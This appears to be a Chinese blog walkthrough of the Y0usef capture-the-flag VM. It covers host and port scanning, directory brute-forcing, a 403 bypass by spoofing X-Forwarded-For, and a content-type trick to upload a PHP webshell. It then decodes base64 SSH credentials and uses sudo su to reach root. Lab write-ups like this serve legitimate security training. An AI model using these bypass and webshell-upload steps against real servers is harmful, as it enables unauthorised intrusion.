Y0usef

实验主机:Os-Y0usef 靶机一台/Kali linux攻击机一台

实验网络:桥接网络

实验目标:获取靶机的Root权限 得到flag

难易程度:简单

一 部署环境

1:下载Virtualbox虚拟化软件

2:下载目标靶机 Y0usef 并导入Virtualbox

需要修改的内容

3:kal改成桥接

二 测试步骤

第一步:信息收集

步骤一:发现主机

arp-scan -l

步骤二:端口扫描

nmap -A -T4 -p- 192.168.3.88 

步骤三:进行目录遍历 访问/adminstration 显示权限不够

gobuster dir -u 192.168.3.88 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.3.5 -t 30



dirsearch -u 192.168.3.88     #有用

步骤四通过403bypass,通常情况下,出现403的响应码有四种方式可以绕过(旁站访问,路径覆盖,Referer绕过和X-Forwarded-For绕过)这里用X-Forwarded-For: 127.0.0.1即可绕过

X-Forwarded-For:127.0.0.1

第二步:漏洞利用 获取webshell

步骤一:成功登录进来,但每个页面的请求都需要带上X-Forwarded-For: 127.0.0.1 并发现一处文件上传的地方

步骤二:通过测试,上传文件功能可拿shell,此功能只需小小的绕过,将content-type改为图片属性即可

步骤三:访问files/1686713238webshell.php 并且连接蚁剑

file uploadad files/16867968671.php

http://192.168.3.88/adminstration/upload/files/16867968671.php

mima:a

步骤四:查看当前权限

第三步:权限提升

步骤一:查看是否有可利用的提权文件或者看能否sudo

find / -perm -4000 -type f 2>/dev/null

步骤二:发现并没有可利用的,查看受否存用户 在home下发现存在yousef 并且再home目录下发现了密码 解码得到 登录名yousef 密码 yousef123

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

ssh : 
user : yousef 
pass : yousef123

步骤三:进行远程登陆 查看其可执行的命令 发现为all 直接sudo su 切换权限 查看flag

sudo su

解码:

You've got the root Congratulations any feedback content me twitter @y0usef_11

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值